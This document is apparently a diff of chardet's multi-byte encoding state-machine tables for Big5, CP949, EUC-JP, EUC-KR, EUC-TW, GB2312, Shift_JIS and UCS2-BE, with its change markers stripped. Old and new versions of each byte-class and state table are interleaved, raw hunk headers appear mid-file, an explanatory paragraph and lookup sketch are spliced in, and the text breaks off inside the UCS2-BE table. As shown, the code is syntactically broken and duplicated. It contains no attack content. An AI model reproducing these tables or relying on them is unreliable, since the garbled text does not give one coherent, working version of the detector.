BIG5_cls = ( \
BIG5_cls = (
1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as legal value
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
4,4,4,4,4,4,4,4, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
4,3,3,3,3,3,3,3, # a0 - a7
3,3,3,3,3,3,3,3, # a8 - af
3,3,3,3,3,3,3,3, # b0 - b7
3,3,3,3,3,3,3,3, # b8 - bf
3,3,3,3,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0) # f8 - ff
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
4,4,4,4,4,4,4,4, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
4,3,3,3,3,3,3,3, # a0 - a7
3,3,3,3,3,3,3,3, # a8 - af
3,3,3,3,3,3,3,3, # b0 - b7
3,3,3,3,3,3,3,3, # b8 - bf
3,3,3,3,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0 # f8 - ff
)
BIG5_st = ( \
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f
eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart)#10-17
BIG5_st = (
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f
eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart#10-17
)
Big5CharLenTable = (0, 1, 1, 2, 0)
@ -76,48 +78,90 @@ Big5SMModel = {'classTable': BIG5_cls,
'charLenTable': Big5CharLenTable,
'name': 'Big5'}
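
Each *SMModel dictionary bundles a byte-class table, a class count ('classFactor'), a state-transition table indexed by state * classFactor + class, and the byte length implied by each class. The consumer is chardet's coding state machine, which is not part of this hunk; the core lookup is roughly the following sketch, using the constants imported at the top of this file (the import path is an assumption about the vendored package):

    from chardet.constants import eStart   # assumed vendored path

    # Sketch only; the vendored CodingStateMachine does the equivalent bookkeeping.
    def sm_step(model, state, byte_value, char_len):
        byte_class = model['classTable'][byte_value]
        if state == eStart:                 # a new multi-byte character begins here
            char_len = model['charLenTable'][byte_class]
        new_state = model['stateTable'][state * model['classFactor'] + byte_class]
        return new_state, char_len
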
# CP949
CP949_cls = (
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,0,0, # 00 - 0f
1,1,1,1,1,1,1,1, 1,1,1,0,1,1,1,1, # 10 - 1f
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 20 - 2f
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 30 - 3f
1,4,4,4,4,4,4,4, 4,4,4,4,4,4,4,4, # 40 - 4f
4,4,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 50 - 5f
1,5,5,5,5,5,5,5, 5,5,5,5,5,5,5,5, # 60 - 6f
5,5,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 70 - 7f
0,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 80 - 8f
6,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 90 - 9f
6,7,7,7,7,7,7,7, 7,7,7,7,7,8,8,8, # a0 - af
7,7,7,7,7,7,7,7, 7,7,7,7,7,7,7,7, # b0 - bf
7,7,7,7,7,7,9,2, 2,3,2,2,2,2,2,2, # c0 - cf
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # d0 - df
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # e0 - ef
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,0, # f0 - ff
)
CP949_st = (
#cls= 0 1 2 3 4 5 6 7 8 9 # previous state =
eError,eStart, 3,eError,eStart,eStart, 4, 5,eError, 6, # eStart
eError,eError,eError,eError,eError,eError,eError,eError,eError,eError, # eError
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe, # eItsMe
eError,eError,eStart,eStart,eError,eError,eError,eStart,eStart,eStart, # 3
eError,eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 4
eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 5
eError,eStart,eStart,eStart,eStart,eError,eError,eStart,eStart,eStart, # 6
)
CP949CharLenTable = (0, 1, 2, 0, 1, 1, 2, 2, 0, 2)
CP949SMModel = {'classTable': CP949_cls,
'classFactor': 10,
'stateTable': CP949_st,
'charLenTable': CP949CharLenTable,
'name': 'CP949'}
# EUC-JP
EUCJP_cls = ( \
4,4,4,4,4,4,4,4, # 00 - 07
4,4,4,4,4,4,5,5, # 08 - 0f
4,4,4,4,4,4,4,4, # 10 - 17
4,4,4,5,4,4,4,4, # 18 - 1f
4,4,4,4,4,4,4,4, # 20 - 27
4,4,4,4,4,4,4,4, # 28 - 2f
4,4,4,4,4,4,4,4, # 30 - 37
4,4,4,4,4,4,4,4, # 38 - 3f
4,4,4,4,4,4,4,4, # 40 - 47
4,4,4,4,4,4,4,4, # 48 - 4f
4,4,4,4,4,4,4,4, # 50 - 57
4,4,4,4,4,4,4,4, # 58 - 5f
4,4,4,4,4,4,4,4, # 60 - 67
4,4,4,4,4,4,4,4, # 68 - 6f
4,4,4,4,4,4,4,4, # 70 - 77
4,4,4,4,4,4,4,4, # 78 - 7f
5,5,5,5,5,5,5,5, # 80 - 87
5,5,5,5,5,5,1,3, # 88 - 8f
5,5,5,5,5,5,5,5, # 90 - 97
5,5,5,5,5,5,5,5, # 98 - 9f
5,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,0,5) # f8 - ff
EUCJP_cls = (
4,4,4,4,4,4,4,4, # 00 - 07
4,4,4,4,4,4,5,5, # 08 - 0f
4,4,4,4,4,4,4,4, # 10 - 17
4,4,4,5,4,4,4,4, # 18 - 1f
4,4,4,4,4,4,4,4, # 20 - 27
4,4,4,4,4,4,4,4, # 28 - 2f
4,4,4,4,4,4,4,4, # 30 - 37
4,4,4,4,4,4,4,4, # 38 - 3f
4,4,4,4,4,4,4,4, # 40 - 47
4,4,4,4,4,4,4,4, # 48 - 4f
4,4,4,4,4,4,4,4, # 50 - 57
4,4,4,4,4,4,4,4, # 58 - 5f
4,4,4,4,4,4,4,4, # 60 - 67
4,4,4,4,4,4,4,4, # 68 - 6f
4,4,4,4,4,4,4,4, # 70 - 77
4,4,4,4,4,4,4,4, # 78 - 7f
5,5,5,5,5,5,5,5, # 80 - 87
5,5,5,5,5,5,1,3, # 88 - 8f
5,5,5,5,5,5,5,5, # 90 - 97
5,5,5,5,5,5,5,5, # 98 - 9f
5,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,0,5 # f8 - ff
)
EUCJP_st = ( \
3, 4, 3, 5,eStart,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17
eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f
3,eError,eError,eError,eStart,eStart,eStart,eStart)#20-27
EUCJP_st = (
3, 4, 3, 5,eStart,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17
eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f
3,eError,eError,eError,eStart,eStart,eStart,eStart#20-27
)
EUCJPCharLenTable = (2, 2, 2, 3, 1, 0)
@ -129,43 +173,45 @@ EUCJPSMModel = {'classTable': EUCJP_cls,
# EUC-KR
EUCKR_cls = ( \
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,3,3,3, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,3,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,0) # f8 - ff
EUCKR_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,3,3,3, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,3,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,0 # f8 - ff
)
EUCKR_st = (
eError,eStart, 3,eError,eError,eError,eError,eError,#00-07
eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart)#08-0f
eError,eStart, 3,eError,eError,eError,eError,eError,#00-07
eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart #08-0f
)
EUCKRCharLenTable = (0, 1, 2, 0)
@ -177,47 +223,49 @@ EUCKRSMModel = {'classTable': EUCKR_cls,
# EUC-TW
EUCTW_cls = ( \
2,2,2,2,2,2,2,2, # 00 - 07
2,2,2,2,2,2,0,0, # 08 - 0f
2,2,2,2,2,2,2,2, # 10 - 17
2,2,2,0,2,2,2,2, # 18 - 1f
2,2,2,2,2,2,2,2, # 20 - 27
2,2,2,2,2,2,2,2, # 28 - 2f
2,2,2,2,2,2,2,2, # 30 - 37
2,2,2,2,2,2,2,2, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,2, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,6,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,3,4,4,4,4,4,4, # a0 - a7
5,5,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,3,1,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0) # f8 - ff
EUCTW_cls = (
2,2,2,2,2,2,2,2, # 00 - 07
2,2,2,2,2,2,0,0, # 08 - 0f
2,2,2,2,2,2,2,2, # 10 - 17
2,2,2,0,2,2,2,2, # 18 - 1f
2,2,2,2,2,2,2,2, # 20 - 27
2,2,2,2,2,2,2,2, # 28 - 2f
2,2,2,2,2,2,2,2, # 30 - 37
2,2,2,2,2,2,2,2, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,2, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,6,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,3,4,4,4,4,4,4, # a0 - a7
5,5,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,3,1,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0 # f8 - ff
)
EUCTW_st = ( \
eError,eError,eStart, 3, 3, 3, 4,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17
eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f
5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27
eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart)#28-2f
EUCTW_st = (
eError,eError,eStart, 3, 3, 3, 4,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17
eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f
5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27
eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f
)
EUCTWCharLenTable = (0, 0, 1, 2, 2, 2, 3)
@ -229,53 +277,55 @@ EUCTWSMModel = {'classTable': EUCTW_cls,
# GB2312
GB2312_cls = ( \
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
3,3,3,3,3,3,3,3, # 30 - 37
3,3,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,4, # 78 - 7f
5,6,6,6,6,6,6,6, # 80 - 87
6,6,6,6,6,6,6,6, # 88 - 8f
6,6,6,6,6,6,6,6, # 90 - 97
6,6,6,6,6,6,6,6, # 98 - 9f
6,6,6,6,6,6,6,6, # a0 - a7
6,6,6,6,6,6,6,6, # a8 - af
6,6,6,6,6,6,6,6, # b0 - b7
6,6,6,6,6,6,6,6, # b8 - bf
6,6,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
6,6,6,6,6,6,6,6, # e0 - e7
6,6,6,6,6,6,6,6, # e8 - ef
6,6,6,6,6,6,6,6, # f0 - f7
6,6,6,6,6,6,6,0) # f8 - ff
GB2312_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
3,3,3,3,3,3,3,3, # 30 - 37
3,3,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,4, # 78 - 7f
5,6,6,6,6,6,6,6, # 80 - 87
6,6,6,6,6,6,6,6, # 88 - 8f
6,6,6,6,6,6,6,6, # 90 - 97
6,6,6,6,6,6,6,6, # 98 - 9f
6,6,6,6,6,6,6,6, # a0 - a7
6,6,6,6,6,6,6,6, # a8 - af
6,6,6,6,6,6,6,6, # b0 - b7
6,6,6,6,6,6,6,6, # b8 - bf
6,6,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
6,6,6,6,6,6,6,6, # e0 - e7
6,6,6,6,6,6,6,6, # e8 - ef
6,6,6,6,6,6,6,6, # f0 - f7
6,6,6,6,6,6,6,0 # f8 - ff
)
GB2312_st = ( \
eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17
4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f
eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27
eError,eError,eStart,eStart,eStart,eStart,eStart,eStart)#28-2f
GB2312_st = (
eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17
4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f
eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27
eError,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f
)
# To be accurate, the length of class 6 can be either 2 or 4.
# But it is not necessary to discriminate between the two since
# it is used for frequency analysis only, and we are validing
# each code range there as well. So it is safe to set it to be
# 2 here.
# To be accurate, the length of class 6 can be either 2 or 4.
# But it is not necessary to discriminate between the two since
# it is used for frequency analysis only, and we are validing
# each code range there as well. So it is safe to set it to be
# 2 here.
GB2312CharLenTable = (0, 1, 1, 1, 1, 1, 2)
GB2312SMModel = {'classTable': GB2312_cls,
@ -286,46 +336,48 @@ GB2312SMModel = {'classTable': GB2312_cls,
# Shift_JIS
SJIS_cls = ( \
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
3,3,3,3,3,3,3,3, # 80 - 87
3,3,3,3,3,3,3,3, # 88 - 8f
3,3,3,3,3,3,3,3, # 90 - 97
3,3,3,3,3,3,3,3, # 98 - 9f
#0xa0 is illegal in sjis encoding, but some pages does
SJIS_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
3,3,3,3,3,2,2,3, # 80 - 87
3,3,3,3,3,3,3,3, # 88 - 8f
3,3,3,3,3,3,3,3, # 90 - 97
3,3,3,3,3,3,3,3, # 98 - 9f
#0xa0 is illegal in sjis encoding, but some pages does
#contain such byte. We need to be more error forgiven.
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,4,4,4, # e8 - ef
4,4,4,4,4,4,4,4, # f0 - f7
4,4,4,4,4,0,0,0) # f8 - ff
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,4,4,4, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,0,0,0) # f8 - ff
SJIS_st = ( \
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart)#10-17
SJIS_st = (
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart #10-17
)
SJISCharLenTable = (0, 1, 1, 2, 0, 0)
@ -337,48 +389,50 @@ SJISSMModel = {'classTable': SJIS_cls,
# UCS2-BE
UCS2BE_cls = ( \
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5) # f8 - ff
UCS2BE_cls = (
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
